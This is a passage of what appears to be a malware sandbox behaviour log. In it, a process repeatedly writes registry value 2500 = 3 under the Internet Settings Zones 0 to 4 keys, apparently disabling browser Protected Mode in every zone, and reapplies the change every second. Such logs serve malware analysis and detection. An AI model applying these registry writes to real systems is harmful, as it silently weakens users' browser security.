1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
